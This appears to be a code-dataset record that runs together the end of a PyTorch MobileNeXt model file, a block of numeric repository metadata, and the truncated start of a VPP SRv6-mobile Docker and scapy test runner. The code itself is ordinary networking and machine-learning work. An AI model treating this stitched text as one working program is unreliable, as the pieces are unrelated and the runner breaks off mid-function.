if len(sandglass_setting) == 0 or len(sandglass_setting[0]) != 4:
raise ValueError("sandglass_setting should be non-empty "
"or a 4-element list, got {}".format(sandglass_setting))
# building first layer
input_channel = _make_divisible(input_channel * width_mult, round_nearest)
self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
# building sandglass blocks
for t, c, n, s in sandglass_setting:
output_channel = _make_divisible(c * width_mult, round_nearest)
for i in range(n):
stride = s if i == 0 else 1
features.append(block(input_channel, output_channel, stride, t, norm_layer=norm_layer))
input_channel = output_channel
# make it nn.Sequential
self.features = nn.Sequential(*features)
# building classifier
self.classifier = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(self.last_channel, num_classes),
)
# weight initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.ones_(m.weight)
nn.init.zeros_(m.bias)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.zeros_(m.bias)
def _forward_impl(self, x):
# This exists since TorchScript doesn't support inheritance, so the superclass method
# (this one) needs to have a name other than `forward` that can be accessed in a subclass
x = self.features(x)
# Cannot use "squeeze" as batch-size can be 1 => must use reshape with x.shape[0]
x = nn.functional.adaptive_avg_pool2d(x, 1).reshape(x.shape[0], -1)
x = self.classifier(x)
return x
def forward(self, x):
return self._forward_impl(x)
def mobilenetv2_sandglass(**kwargs):
sandgrass_setting = [
# t, c, n, s
[1, 16, 1, 1],
[6, 144, 2, 2],
[6, 192, 3, 2],
[6, 384, 4, 2],
[6, 576, 3, 1],
[6, 960, 3, 2],
[6, 1920, 1, 1],
# [1, 16, 1, 1],
# [6, 24, 2, 2],
# [6, 32, 3, 2],
# [6, 64, 4, 2],
# [6, 96, 3, 1],
# [6, 160, 3, 2],
# [6, 320, 1, 1],
]
block = Sandglass
return MobileNetV2(inverted_residual_setting=sandgrass_setting, block=block, **kwargs)
def my_mobilenext(**kwargs):
block = My_Sandglass
return MobileNeXt(block=block, **kwargs)
def my_mobilenext_2(**kwargs):
block = My_Sandglass_2
return MobileNeXt(block=block, **kwargs)
if __name__=='__main__':
import torch
from torchvision import models
model = MobileNeXt()
print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
print(len(list(model.modules())))
# model = my_mobilenext()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = MobileNetV2()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = models.mobilenet_v2(pretrained=False, width_mult=1.0)
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model =mobilenetv2_sandglass()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = MobileNetV2_sandglass()
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters()) / 1024. / 1024.0))
# print(len(list(model.modules())))
# model = InvertedResidual(32, 32, 1, 6)
# print('InvertedResidual params: %.f' % (sum(p.numel() for p in model.parameters())))
# print(len(list(model.modules())))
# print(model)
# model = Sandglass(192, 192, 1, 6)
# print('Sandglass params: %.f' % (sum(p.numel() for p in model.parameters())))
# print(len(list(model.modules())))
# # print(model)
# model = My_Sandglass(192, 192, 1, 6)
# print('Sandglass params: %.f' % (sum(p.numel() for p in model.parameters())))
# print(len(list(model.modules())))
# print(model)
# model.eval()
# # print(model)
input = torch.randn(1, 3, 224, 224)
# y = model(input)
# # print(y.shape)
# print('Total params: %f M' % (sum(p.numel() for p in model.parameters())/ 1024. / 1024.0))
from thop import profile
flops, params = profile(model, inputs=[input])
print(flops)
print(params)
print('Total params: %f M' % (sum(p.numel() for p in model.parameters())))
| 36.489149
| 107
| 0.569383
| 2,902
| 21,857
| 4.13439
| 0.099242
| 0.048758
| 0.036423
| 0.018003
| 0.835389
| 0.822887
| 0.812469
| 0.804134
| 0.794382
| 0.791132
| 0
| 0.040689
| 0.317473
| 21,857
| 599
| 108
| 36.489149
| 0.763574
| 0.22693
| 0
| 0.705729
| 0
| 0
| 0.017391
| 0.00303
| 0
| 0
| 0
| 0
| 0.010417
| 1
| 0.065104
| false
| 0
| 0.010417
| 0.007813
| 0.153646
| 0.013021
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c438fb161b7d5262c315d1aaafbc5136989d05ef
| 84,051
|
py
|
Python
|
src/plugins/srv6-mobile/extra/runner.py
|
cscnull/vpp
|
c95eefb393d05167ce6e35e5617179f536de0bda
|
[
"Apache-2.0"
] | null | null | null |
src/plugins/srv6-mobile/extra/runner.py
|
cscnull/vpp
|
c95eefb393d05167ce6e35e5617179f536de0bda
|
[
"Apache-2.0"
] | null | null | null |
src/plugins/srv6-mobile/extra/runner.py
|
cscnull/vpp
|
c95eefb393d05167ce6e35e5617179f536de0bda
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
from os.path import dirname, realpath, split,\
join, isdir, exists
from os import remove, system, mkdir
from logging import getLogger, basicConfig,\
DEBUG, INFO, ERROR
from argparse import ArgumentParser
from atexit import register
from shutil import rmtree
from jinja2 import Environment, FileSystemLoader
from docker.errors import NotFound, APIError
from docker import from_env
from scapy.contrib.gtp import *
from scapy.all import *
verbose_levels = {
'error': ERROR,
'debug': DEBUG,
'info': INFO}
class ContainerStartupError(Exception):
pass
class Container(object):
tmp = "/tmp"
cmd = "vppctl -s 0:5002"
cmd_bash = "/bin/bash"
def __init__(self, ref, name):
self._name = name
self._ref = ref
@property
def name(self):
return self._name
@property
def temp(self):
return join(self.tmp, self.name)
@property
def pg_input_file(self):
return join(self.temp, "pgi.pcap")
@property
def pg_output_file(self):
return join(self.temp, "pgo.pcap")
@property
def pg_input_file_in(self):
return join("/mnt", "pgi.pcap")
@property
def pg_output_file_in(self):
return join("/mnt", "pgo.pcap")
def disconnect_all(self):
status = False
for net in self._ref.client.networks.list():
try:
net.disconnect(self._ref)
except APIError:
continue
status = True
return status
@classmethod
def new(cls, client, image, name):
temp = join(cls.tmp, name)
if isdir(temp):
rmtree(temp)
mkdir(temp)
ref = client.containers.run(
detach=True,
remove=True,
auto_remove=True,
image=image,
name=name,
privileged=True,
volumes={
temp: {
'bind': '/mnt',
'mode': 'rw'}})
obj = cls.get(client, name)
if not obj:
raise ContainerStartupError()
obj.disconnect_all()
return obj
@classmethod
def get(cls, client, name):
try:
ref = client.containers.get(name)
except NotFound:
pass
else:
return cls(ref, name)
def rem(self):
self._ref.kill()
def vppctl(self):
system("docker exec -it {} {}".format(self.name, self.cmd))
def bash(self):
system("docker exec -it {} {}".format(self.name, self.cmd_bash))
def vppctl_exec(self, cmd):
ec, resp = self._ref.exec_run(cmd="{} {}".format(self.cmd, cmd))
assert(ec == 0)
return resp
def setup_host_interface(self, name, ip):
self.vppctl_exec("create host-interface name {}".format(name))
self.vppctl_exec("set int ip addr host-{} {}".format(name, ip))
self.vppctl_exec("set int state host-{} up".format(name))
def pg_create_interface(self, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface pg0")
self.vppctl_exec("set int mac address pg0 {}".format(local_mac))
self.vppctl_exec("set int ip addr pg0 {}".format(local_ip))
self.vppctl_exec(
"set ip neighbor pg0 {} {}".format(remote_ip, remote_mac))
self.vppctl_exec("set int state pg0 up")
def pg_create_interface4(self, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface pg0")
self.vppctl_exec("set int mac address pg0 {}".format(local_mac))
self.vppctl_exec("set int ip addr pg0 {}".format(local_ip))
self.vppctl_exec("set ip neighbor pg0 {} {}".format(remote_ip, remote_mac))
self.vppctl_exec("set int state pg0 up")
def pg_create_interface6(self, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface pg0")
self.vppctl_exec("set int mac address pg0 {}".format(local_mac))
self.vppctl_exec("set int ip addr pg0 {}".format(local_ip))
self.vppctl_exec("set ip neighbor pg0 {} {}".format(remote_ip, remote_mac))
self.vppctl_exec("set int state pg0 up")
def pg_create_interface4_name(self, ifname, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface {}".format(ifname))
self.vppctl_exec("set int mac address {} {}".format(ifname, local_mac))
self.vppctl_exec("set int ip addr {} {}".format(ifname, local_ip))
self.vppctl_exec("set ip neighbor {} {} {}".format(ifname, remote_ip, remote_mac))
self.vppctl_exec("set int state {} up".format(ifname))
def pg_create_interface6_name(self, ifname, local_ip, remote_ip, local_mac, remote_mac):
# remote_ip can't have subnet mask
time.sleep(2)
self.vppctl_exec("create packet-generator interface {}".format(ifname))
self.vppctl_exec("set int mac address {} {}".format(ifname, local_mac))
self.vppctl_exec("set int ip addr {} {}".format(ifname, local_ip))
self.vppctl_exec("set ip neighbor {} {} {}".format(ifname, remote_ip, remote_mac))
self.vppctl_exec("set int state {} up".format(ifname))
def pg_enable(self):
# start packet generator
self.vppctl_exec("packet-generator enable")
def pg_create_stream(self, stream):
wrpcap(self.pg_input_file, stream)
self.vppctl_exec(
"packet-generator new name pg-stream "
"node ethernet-input pcap {}".format(
self.pg_input_file_in))
def pg_start_capture(self):
if exists(self.pg_output_file):
remove(self.pg_output_file)
self.vppctl_exec(
"packet-generator capture pg0 pcap {}".format(
self.pg_output_file_in))
def pg_start_capture_name(self, ifname):
if exists(self.pg_output_file):
remove(self.pg_output_file)
self.vppctl_exec(
"packet-generator capture {} pcap {}".format(
ifname, self.pg_output_file_in))
def pg_read_packets(self):
return rdpcap(self.pg_output_file)
def set_ipv6_route(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec(
"ip route add {} via host-{} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ipv6_route2(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec(
"ip route add {} via {} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ip_pgroute(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec("ip route add {} via {} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ipv6_pgroute(self, out_if_name, next_hop_ip, subnet):
self.vppctl_exec("ip route add {} via {} {}".format(
subnet, out_if_name, next_hop_ip))
def set_ipv6_default_route(self, out_if_name, next_hop_ip):
self.vppctl_exec(
"ip route add ::/0 via host-{} {}".format(
out_if_name, next_hop_ip))
def enable_trace(self, count):
self.vppctl_exec("trace add af-packet-input {}".format(count))
class Containers(object):
def __init__(self, client, image):
self.client = client
self.image = image
def tmp_render(self, path, template, kwargs):
with open(path, "w") as fo:
fo.write(template.render(**kwargs))
register(lambda: remove(path))
def build(self, path, vpp_path):
env = Environment(loader=FileSystemLoader(path),
trim_blocks=True)
self.tmp_render(join(vpp_path, "Dockerfile"),
env.get_template("Dockerfile.j2"),
{'vpp_path': vpp_path})
self.tmp_render(join(vpp_path, "startup.conf"),
env.get_template("startup.conf.j2"),
{'vpp_path': vpp_path})
ref, _ = self.client.images.build(path=vpp_path,
tag=self.image, rm=True)
return ref
def release(self, path, vpp_path):
env = Environment(loader=FileSystemLoader(path),
trim_blocks=True)
self.tmp_render(join(vpp_path, "Dockerfile"),
env.get_template("Dockerfile.j2.release"),
{'vpp_path': vpp_path})
self.tmp_render(join(vpp_path, "startup.conf"),
env.get_template("startup.conf.j2"),
{'vpp_path': vpp_path})
ref, _ = self.client.images.build(path=vpp_path,
tag="srv6m-release-image", rm=True)
return ref
def new(self, name):
return Container.new(self.client, self.image, name)
def get(self, name):
return Container.get(self.client, name)
def vppctl(self, name, command=None):
container = self.get(name)
if not command:
container.vppctl()
else:
print(container.vppctl_exec(command).decode())
def bash(self, name):
container = self.get(name)
container.bash()
class Network(object):
def __init__(self, ref, name):
self._name = name
self._ref = ref
@property
def name(self):
return self._name
@classmethod
def new(cls, client, name):
ref = client.networks.create(name, driver="bridge",
check_duplicate=True)
return cls(ref, name)
@classmethod
def get(cls, client, name):
try:
ref = client.networks.get(name)
except NotFound:
pass
else:
return cls(ref, name)
def rem(self):
self._ref.remove()
def connect(self, c):
self._ref.connect(c.name)
class Networks(object):
def __init__(self, client):
self.client = client
def new(self, name):
return Network.new(self.client, name)
def get(self, name):
return Network.get(self.client, name)
class Program(object):
image = "srv6m-image"
name_prefix = "hck"
# TODO: add description to these instances
# for exmaple what the vpp is supposed to be
# in our topoloty overview
instance_names = ["vpp-1",
"vpp-2",
"vpp-3",
"vpp-4"]
network_names = ["net-1",
"net-2",
"net-3"]
def __init__(self, image=None, prefix=None):
self.path = dirname(realpath(__file__))
if image:
self.image = image
if prefix is not None:
self.name_prefix = prefix
client = from_env()
self.containers = Containers(client, self.image)
self.networks = Networks(client)
self.logger = getLogger(__name__)
@property
def vpp_path(self):
return self.path.rsplit("/", 4)[0]
def get_name(self, name):
if not self.name_prefix:
return name
return "{}-{}".format(self.name_prefix, name)
def stop_containers(self):
for name in self.instance_names:
instance = self.containers.get(self.get_name(name))
if instance:
instance.rem()
for name in self.network_names:
network = self.networks.get(self.get_name(name))
if network:
network.rem()
def start_containers(self):
self.stop_containers()
networks = list()
for name in self.network_names:
networks.append(self.networks.new(self.get_name(name)))
n1, n2, n3 = networks
instances = list()
for name in self.instance_names:
instances.append(self.containers.new(self.get_name(name)))
c1, c2, c3, c4 = instances
# setup packet generator interfaces
# c1.pg_create_interface(local_ip="C::1/120", remote_ip="C::2",
# local_mac="aa:bb:cc:dd:ee:01", remote_mac="aa:bb:cc:dd:ee:02")
# setup network between instances
n1.connect(c1)
n1.connect(c2)
n2.connect(c2)
n2.connect(c3)
n3.connect(c3)
n3.connect(c4)
# c1 & c2 link
c1.setup_host_interface("eth1", "A1::1/120")
c2.setup_host_interface("eth1", "A1::2/120")
# c2 & c3 link
c2.setup_host_interface("eth2", "A2::1/120")
c3.setup_host_interface("eth1", "A2::2/120")
# c3 & c4 link
c3.setup_host_interface("eth2", "A3::1/120")
c4.setup_host_interface("eth1", "A3::2/120")
# c1 > c2 default route
c1.set_ipv6_default_route("eth1", "A1::2")
# c2 > c3 default route
c2.set_ipv6_default_route("eth2", "A2::2")
# c3 > c2 default route
c3.set_ipv6_default_route("eth1", "A2::1")
# c4 > c3 default route
c4.set_ipv6_default_route("eth1", "A3::1")
# c3 > c4 static route for address B::1/128
c3.set_ipv6_route("eth2", "A3::2", "B::1/128")
c3.set_ipv6_route("eth2", "A3::2", "B::2/128")
def test_ping(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="B::2") / ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_srv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 C::1/120
# pg interface on c4 B::1/120
self.start_containers()
print("Sleeping")
time.sleep(30)
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface(
local_ip="C::1/120",
remote_ip="C::2",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface(
local_ip="B::1/120",
remote_ip="B::2",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr D1::")
c1.vppctl_exec(
"sr policy add bsid D1::999:1 next D2:: next D3:: next D4::")
c1.vppctl_exec("sr steer l3 B::/120 via bsid D1::999:1")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec("sr localsid address D4:: behavior end.dx6 pg0 B::2")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/128")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IPv6(src="C::2", dst="B::2") / ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c2.enable_trace(10)
c3.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
''' T.Map is obsolete
def test_tmap(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_tmap_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_tmap_ipv6(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_tmap_ipv6_5g(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec(
"sr policy add bsid D1:: next D2:: next D3:: "
"gtp4_removal sr_prefix D4::/32 v6src_prefix C1::/64")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D1::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
GTPPDUSessionContainer(R=1, QFI=3) /
IPv6(src="2001::1", dst="2002::1") /
ICMPv6EchoRequest())
print("Sending packet on {}:".format(c1.name))
print("Sending packet on {}:".format(c1.name))
p.show2()
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
'''
def test_gtp4(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
c1.vppctl_exec("sr policy add bsid D4:: next D2:: next D3::")
c1.vppctl_exec("sr policy add bsid D5:: behavior t.m.gtp4.d D4::/32 v6src_prefix C1::/64 nhtype ipv4")
c1.vppctl_exec("sr steer l3 172.20.0.1/32 via bsid D5::")
c2.vppctl_exec("sr localsid address D2:: behavior end")
c3.vppctl_exec("sr localsid address D3:: behavior end")
c4.vppctl_exec(
"sr localsid prefix D4::/32 "
"behavior end.m.gtp4.e v4src_position 64")
c2.set_ipv6_route("eth2", "A2::2", "D3::/128")
c2.set_ipv6_route("eth1", "A1::1", "C::/120")
c3.set_ipv6_route("eth2", "A3::2", "D4::/32")
c3.set_ipv6_route("eth1", "A2::1", "C::/120")
c4.set_ip_pgroute("pg0", "1.0.0.1", "172.20.0.1/32")
p = (Ether(src="aa:bb:cc:dd:ee:02", dst="aa:bb:cc:dd:ee:01") /
IP(src="172.20.0.2", dst="172.20.0.1") /
UDP(sport=2152, dport=2152) /
GTP_U_Header(gtp_type="g_pdu", teid=200) /
IP(src="172.99.0.1", dst="172.99.0.2") /
ICMP())
print("Sending packet on {}:".format(c1.name))
p.show2()
time.sleep(10)
c1.enable_trace(10)
c4.enable_trace(10)
c4.pg_start_capture()
c1.pg_create_stream(p)
c1.pg_enable()
# timeout (sleep) if needed
print("Sleeping")
time.sleep(5)
print("Receiving packet on {}:".format(c4.name))
for p in c4.pg_read_packets():
p.show2()
def test_gtp4_usid(self):
# TESTS:
# trace add af-packet-input 10
# pg interface on c1 172.20.0.1
# pg interface on c4 B::1/120
self.start_containers()
c1 = self.containers.get(self.get_name(self.instance_names[0]))
c2 = self.containers.get(self.get_name(self.instance_names[1]))
c3 = self.containers.get(self.get_name(self.instance_names[2]))
c4 = self.containers.get(self.get_name(self.instance_names[-1]))
c1.pg_create_interface4(
local_ip="172.16.0.1/30",
remote_ip="172.16.0.2/30",
local_mac="aa:bb:cc:dd:ee:01",
remote_mac="aa:bb:cc:dd:ee:02")
c4.pg_create_interface4(
local_ip="1.0.0.2/30",
remote_ip="1.0.0.1",
local_mac="aa:bb:cc:dd:ee:11",
remote_mac="aa:bb:cc:dd:ee:22")
c1.vppctl_exec("set sr encaps source addr A1::1")
